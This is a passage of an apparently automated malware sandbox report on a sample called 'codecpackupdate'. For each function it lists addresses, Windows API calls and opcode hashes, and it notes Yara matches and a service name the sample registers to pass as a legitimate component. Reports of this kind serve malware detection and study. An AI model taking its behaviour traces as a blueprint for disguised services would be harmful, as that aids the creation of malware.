                                                                          • Instruction ID: 447aaf8d91f917388d91f819e56d14c00b25ff59680aa14e98b531eea3950c95
                                                                          • Opcode Fuzzy Hash: a697c161d1907d6f93caa1ae62d4d9161d741e116a09679514cdef925c12965b
                                                                          • Instruction Fuzzy Hash: 71E0E6B19056089FDB08BBA4EA46E6E7775AF04301F110555F1015B1E1DE7899409B25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B8CE Relevance: 1.5, APIs: 1, Instructions: 18libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExA.KERNELBASE(?,00000000), ref: 0040B8D6
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 6136a3877e6e2f0dd4123d90e237bad55ebe4cd6e2fa0a15503b3406c486cffe
                                                                          • Instruction ID: 868a890bdf16fbdb6b0f6a21b24728291ff6892bb476c2b181fa5c28a3fa7e1e
                                                                          • Opcode Fuzzy Hash: 6136a3877e6e2f0dd4123d90e237bad55ebe4cd6e2fa0a15503b3406c486cffe
                                                                          • Instruction Fuzzy Hash: ADD05E3460820ADBDB109F20CD8866936A0EB253407004676EC07AE294EBB4D9028A89
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B00D Relevance: 1.5, APIs: 1, Instructions: 16registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegCreateKeyExA.KERNELBASE ref: 0040B00D
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 500ff6ea7e252baa5171073ac6586a82d290a4070e409aae7b418b8824e4eb1f
                                                                          • Instruction ID: c2c62dfceaa2ca30394ff8bbcbca8809a465483e77cd5c694646456b11ff8d88
                                                                          • Opcode Fuzzy Hash: 500ff6ea7e252baa5171073ac6586a82d290a4070e409aae7b418b8824e4eb1f
                                                                          • Instruction Fuzzy Hash: 1FD0A77490810297D71056216E9DE65316CA704304F500236BE09B21D2E7B88956555E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A35AF3 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.0000000000A2A000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_a2a000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: abc47b0896c64a13a78bd09c05f9cc6de3580a10cf4c696721996d3e8e654410
                                                                          • Instruction ID: 4c55868cee638e3b3058026ff17e548d659481f2e97a8cc0b81c02cf84b193dd
                                                                          • Opcode Fuzzy Hash: abc47b0896c64a13a78bd09c05f9cc6de3580a10cf4c696721996d3e8e654410
                                                                          • Instruction Fuzzy Hash: EFD06CB241CB09CFC3917F69A884279BBF8AB48700F52492CD6C692641EA3418849B9A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004024EC Relevance: 1.5, APIs: 1, Instructions: 12synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040BB0F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSingleWait
                                                                          • String ID:
                                                                          • API String ID: 24740636-0
                                                                          • Opcode ID: 06cd4e1e2b5318ed55d10e10e6ab17b413496d7c215a766dc1cd46bbc1e42b35
                                                                          • Instruction ID: ef0758628b503f26ab19731c94afa928a07457d65258333e7402194836c43395
                                                                          • Opcode Fuzzy Hash: 06cd4e1e2b5318ed55d10e10e6ab17b413496d7c215a766dc1cd46bbc1e42b35
                                                                          • Instruction Fuzzy Hash: EFD0122110C091FFC65687A48C649A13BB8DD063553294AB3A463725E1C63C2016E36F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040BB7F Relevance: 1.5, APIs: 1, Instructions: 10registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040BBA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 74f322b8ff5043d62f76b6d4d9924e6e430d0f9e420fe5ff5ec3609d02c6becc
                                                                          • Instruction ID: bc9fcb05ae8656bc41f953a4491f85b4eae85a5287a10dbca2abb42cf387f289
                                                                          • Opcode Fuzzy Hash: 74f322b8ff5043d62f76b6d4d9924e6e430d0f9e420fe5ff5ec3609d02c6becc
                                                                          • Instruction Fuzzy Hash: 07C012308080029BD71547649D08624BF70FB013007114061D183349A3C3366453A78E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B72C Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 4208be6c401ace8eaf57d9faaff6df1abccb720293123bf60b5afa5c9f998a5b
                                                                          • Instruction ID: 7a8fb3575aad36e99e01433973275fcd838bbbcd725035783ab06971788b140c
                                                                          • Opcode Fuzzy Hash: 4208be6c401ace8eaf57d9faaff6df1abccb720293123bf60b5afa5c9f998a5b
                                                                          • Instruction Fuzzy Hash: 5D017B72849596DBC7228F619D8CAA53F20EB05300B2C47FAE581769A2C33AD917D7CD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B5E6 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000003E8), ref: 0040B673
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 4923c56613507f6154e6695a1a0a79be905ca74f5fc4bb1a8d63dae53b35cfd4
                                                                          • Instruction ID: c46616b9988c65e90fc05240c7557c229c01b71e50158476c3ddc31f6f3b184e
                                                                          • Opcode Fuzzy Hash: 4923c56613507f6154e6695a1a0a79be905ca74f5fc4bb1a8d63dae53b35cfd4
                                                                          • Instruction Fuzzy Hash: 22017D761987109DC721CA384D46D923B68EE22700B69096BF142BF1E2D33B950BD6CF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A020A0 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00A01550: OpenEventA.KERNEL32(00100002,00000000,00000000,35B6412D), ref: 00A015F0
                                                                            • Part of subcall function 00A01550: CloseHandle.KERNEL32(00000000), ref: 00A01605
                                                                            • Part of subcall function 00A01550: ResetEvent.KERNEL32(00000000,35B6412D), ref: 00A0160F
                                                                            • Part of subcall function 00A01550: CloseHandle.KERNEL32(00000000,35B6412D), ref: 00A01644
                                                                          • TlsSetValue.KERNEL32(00000025,?), ref: 00A020EA
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseEventHandle$OpenResetValue
                                                                          • String ID:
                                                                          • API String ID: 1556185888-0
                                                                          • Opcode ID: 5b1a86e2d240fed508c78ac947ac665bed0d89603f8bb136d9e893b50606d726
                                                                          • Instruction ID: fdbddc25b5807c6f7e7a72db6fb203dc62715f98362243bcc87147a9a03bcfed
                                                                          • Opcode Fuzzy Hash: 5b1a86e2d240fed508c78ac947ac665bed0d89603f8bb136d9e893b50606d726
                                                                          • Instruction Fuzzy Hash: FD014F72A44208ABC710CF99ED45F9ABBB8FB09760F10862AF825D36D0D775690586A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040226E Relevance: 1.3, APIs: 1, Instructions: 38stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 1586166983-0
                                                                          • Opcode ID: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                          • Instruction ID: b9dd472658aa79e8713cc1c43643f3a09ee23d5b7ec078f99577b19effab2280
                                                                          • Opcode Fuzzy Hash: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                          • Instruction Fuzzy Hash: 54F09A3260C2538EC74216656A082B67BA0AA51710B38847B9C87B51D2DBBC485376AF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B2EF Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNELBASE(?), ref: 0040B2FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 18c128e7e1d3a70a9118cf2a5e811f5c9c954107df949b2efcfa9b5db2156fc9
                                                                          • Instruction ID: 30eba2562c68e96c98e1aa31e98657024e3942590acf667e384b09b50b6edfb8
                                                                          • Opcode Fuzzy Hash: 18c128e7e1d3a70a9118cf2a5e811f5c9c954107df949b2efcfa9b5db2156fc9
                                                                          • Instruction Fuzzy Hash: 0BC08C31100901E7C7000B348E0C181B728FF007003260132EC03709A0C37E542DAAAD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B6EC Relevance: 1.3, APIs: 1, Instructions: 8sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 7555949166ef3385efc278390852ec46746e317434f07fbea60302d659f1b0da
                                                                          • Instruction ID: 130aa393355d1d3f730376283a7cbe41ada4335551948cec256614a457e6477e
                                                                          • Opcode Fuzzy Hash: 7555949166ef3385efc278390852ec46746e317434f07fbea60302d659f1b0da
                                                                          • Instruction Fuzzy Hash: 43C08C30805940DBD2164B306E08B143B30E721700F200964E24320CE1833A6025D609
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402322 Relevance: 1.3, APIs: 1, Instructions: 8sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000003E8), ref: 0040B673
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 2f3bbf81509a6403ce4eb6566e4c2682b327bd7fda14c88d04de4b44162c8b52
                                                                          • Instruction ID: daca3ffbd5ff764758662f534c55e9e56749cc2f8a70cc823d56b72693b939bd
                                                                          • Opcode Fuzzy Hash: 2f3bbf81509a6403ce4eb6566e4c2682b327bd7fda14c88d04de4b44162c8b52
                                                                          • Instruction Fuzzy Hash: 3BB092305C8B01FEE10107A09E59F386621E720B00F220623A703780E08BBA0663BA8F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B66D Relevance: 1.3, APIs: 1, Instructions: 7sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000003E8), ref: 0040B673
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 00bf01a9b72d648d1cebd4848209a3c99be8b6c7cbdd3909c15e8f7d0f3832f1
                                                                          • Instruction ID: a3b9e5ac81abcb523932f8946054f8d2fd83f5673244a20f1dfd6dc4be3b2ef3
                                                                          • Opcode Fuzzy Hash: 00bf01a9b72d648d1cebd4848209a3c99be8b6c7cbdd3909c15e8f7d0f3832f1
                                                                          • Instruction Fuzzy Hash: 4EB092B1488A01AAE6010B905A2EB207622F720B00F120A22E303380E143BA0222ABCE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 00A008B8 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 00A008E2
                                                                          • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 00A008EA
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorFormatLastMessage
                                                                          • String ID:
                                                                          • API String ID: 3479602957-0
                                                                          • Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                          • Instruction ID: 333be5aae6f226cacc47348891d90bc2c98ab52a1229338f12648adbffde0238
                                                                          • Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                          • Instruction Fuzzy Hash: A8F03A30208345DFEB24CE25C851F2EBBE4AB9D794F60092CF596A21D2D770E5858B6A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A09468 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A04DD6,?,?,?,00000001), ref: 00A0946D
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00A09476
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 1193d7dbbbb34bd6c77dfc6ab789bc50217473f588e97d2bd980f34255f982d3
                                                                          • Instruction ID: 3beb0640bd387da71726515768a6bef449b952e2754b3bd16696c40136d41696
                                                                          • Opcode Fuzzy Hash: 1193d7dbbbb34bd6c77dfc6ab789bc50217473f588e97d2bd980f34255f982d3
                                                                          • Instruction Fuzzy Hash: 98B09235148308EBCB01ABD1EC09BDD3F38EB086A2F009410F60E44060CB6294129AA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F24E1 Relevance: 21.2, APIs: 14, Instructions: 173COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F24E6
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 009F24FC
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 009F250E
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 009F256D
                                                                          • SetLastError.KERNEL32(00000000,?,74DEDFB0), ref: 009F257F
                                                                          • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,74DEDFB0), ref: 009F2599
                                                                          • GetLastError.KERNEL32(?,74DEDFB0), ref: 009F25A2
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009F25F0
                                                                          • InterlockedDecrement.KERNEL32(00000002), ref: 009F262F
                                                                          • InterlockedExchange.KERNEL32(00000000,00000000), ref: 009F268E
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009F2699
                                                                          • InterlockedExchange.KERNEL32(00000000,00000001), ref: 009F26AD
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,74DEDFB0), ref: 009F26BD
                                                                          • GetLastError.KERNEL32(?,74DEDFB0), ref: 009F26C7
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                          • String ID:
                                                                          • API String ID: 1213838671-0
                                                                          • Opcode ID: 8c2beb13ae59835c5b4197e3a1461a190a63df179fda089930f3cc10f335ccf7
                                                                          • Instruction ID: b94e1493056c0db707dd03c755196b1391d116f1202f78238fa869f01bf28098
                                                                          • Opcode Fuzzy Hash: 8c2beb13ae59835c5b4197e3a1461a190a63df179fda089930f3cc10f335ccf7
                                                                          • Instruction Fuzzy Hash: 5A613E71904309EFCB10DFA4D989AEEBBB9FF48310F10952AF616E7250D7349945CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F4603 Relevance: 19.9, APIs: 13, Instructions: 442networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F4608
                                                                            • Part of subcall function 00A03A8F: _malloc.LIBCMT ref: 00A03AA7
                                                                          • htons.WS2_32(?), ref: 009F4669
                                                                          • htonl.WS2_32(?), ref: 009F468C
                                                                          • htonl.WS2_32(00000000), ref: 009F4693
                                                                          • htons.WS2_32(00000000), ref: 009F4747
                                                                          • _sprintf.LIBCMT ref: 009F475D
                                                                            • Part of subcall function 009F88BF: _memmove.LIBCMT ref: 009F88DF
                                                                          • htons.WS2_32(?), ref: 009F46B0
                                                                            • Part of subcall function 009F966A: __EH_prolog.LIBCMT ref: 009F966F
                                                                            • Part of subcall function 009F966A: RtlEnterCriticalSection.NTDLL(00000020), ref: 009F96EA
                                                                            • Part of subcall function 009F966A: RtlLeaveCriticalSection.NTDLL(00000020), ref: 009F9708
                                                                            • Part of subcall function 009F1BA7: __EH_prolog.LIBCMT ref: 009F1BAC
                                                                            • Part of subcall function 009F1BA7: RtlEnterCriticalSection.NTDLL ref: 009F1BBC
                                                                            • Part of subcall function 009F1BA7: RtlLeaveCriticalSection.NTDLL ref: 009F1BEA
                                                                            • Part of subcall function 009F1BA7: RtlEnterCriticalSection.NTDLL ref: 009F1C13
                                                                            • Part of subcall function 009F1BA7: RtlLeaveCriticalSection.NTDLL ref: 009F1C56
                                                                            • Part of subcall function 009FDE26: __EH_prolog.LIBCMT ref: 009FDE2B
                                                                          • htonl.WS2_32(?), ref: 009F497C
                                                                          • htonl.WS2_32(00000000), ref: 009F4983
                                                                          • htonl.WS2_32(00000000), ref: 009F49C8
                                                                          • htonl.WS2_32(00000000), ref: 009F49CF
                                                                          • htons.WS2_32(?), ref: 009F49EF
                                                                          • htons.WS2_32(?), ref: 009F49F9
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                          • String ID:
                                                                          • API String ID: 1645262487-0
                                                                          • Opcode ID: c5aa58de93275a593b571f635141f1bae74eabdc3349f6b07a9041dcef5b0ca9
                                                                          • Instruction ID: d2b1be23d0416486c65c3b29cb50ac1645a1029d0c760aaa297e7d54d49b8b4b
                                                                          • Opcode Fuzzy Hash: c5aa58de93275a593b571f635141f1bae74eabdc3349f6b07a9041dcef5b0ca9
                                                                          • Instruction Fuzzy Hash: 2C025671C0025DEEDF15DBE4C845BFEBBB8AF48304F10415AE605B7291EB746A89CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004023B3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75registrysynchronizationthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegisterServiceCtrlHandlerA.ADVAPI32(WWAN_MobileFixup 2.33.197.66,Function_0000235E), ref: 004023C1
                                                                          • SetServiceStatus.ADVAPI32(0040A110), ref: 00402420
                                                                          • GetLastError.KERNEL32 ref: 00402422
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                          • GetLastError.KERNEL32 ref: 00402450
                                                                          • SetServiceStatus.ADVAPI32(0040A110), ref: 00402480
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                          • CloseHandle.KERNEL32 ref: 004024A1
                                                                          • SetServiceStatus.ADVAPI32(0040A110), ref: 004024CA
                                                                          Strings
                                                                          • WWAN_MobileFixup 2.33.197.66, xrefs: 004023BC
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                          • String ID: WWAN_MobileFixup 2.33.197.66
                                                                          • API String ID: 3346042915-2719033208
                                                                          • Opcode ID: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                          • Instruction ID: 16ab96e2cb68f3bca67a8d02827ccf702012fa4ba7b91bfe8048b6e668af4302
                                                                          • Opcode Fuzzy Hash: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                          • Instruction Fuzzy Hash: A621ECB0841310ABC2109F16EF4D9167EB8EBCA758F11413AE105BA2B2C7B94575CFAE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A08272 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlDecodePointer.NTDLL(?), ref: 00A0827A
                                                                          • _free.LIBCMT ref: 00A08293
                                                                            • Part of subcall function 00A02EB4: HeapFree.KERNEL32(00000000,00000000,?,00A05C12,00000000,00000104,74DF0A60), ref: 00A02EC8
                                                                            • Part of subcall function 00A02EB4: GetLastError.KERNEL32(00000000,?,00A05C12,00000000,00000104,74DF0A60), ref: 00A02EDA
                                                                          • _free.LIBCMT ref: 00A082A6
                                                                          • _free.LIBCMT ref: 00A082C4
                                                                          • _free.LIBCMT ref: 00A082D6
                                                                          • _free.LIBCMT ref: 00A082E7
                                                                          • _free.LIBCMT ref: 00A082F2
                                                                          • _free.LIBCMT ref: 00A08316
                                                                          • RtlEncodePointer.NTDLL(008FAC10), ref: 00A0831D
                                                                          • _free.LIBCMT ref: 00A08332
                                                                          • _free.LIBCMT ref: 00A08348
                                                                          • _free.LIBCMT ref: 00A08370
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 3064303923-0
                                                                          • Opcode ID: fb05ec1cd427dc423d612da55e4c6fd952a49807446406230ce487482f852e64
                                                                          • Instruction ID: ea012e58441ed3964331dfe05b118dd6b5e987df6773556f692204472788f7f6
                                                                          • Opcode Fuzzy Hash: fb05ec1cd427dc423d612da55e4c6fd952a49807446406230ce487482f852e64
                                                                          • Instruction Fuzzy Hash: 57219E32946618DBCB3AEF98FD446673B60AF057203094039E944572E1CA389C47CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F3423 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F3428
                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 009F346B
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 009F3472
                                                                          • GetLastError.KERNEL32 ref: 009F3486
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 009F34D7
                                                                          • RtlEnterCriticalSection.NTDLL(00000018), ref: 009F34ED
                                                                          • RtlLeaveCriticalSection.NTDLL(00000018), ref: 009F3518
                                                                          Strings
                                                                          Memory Dump Source
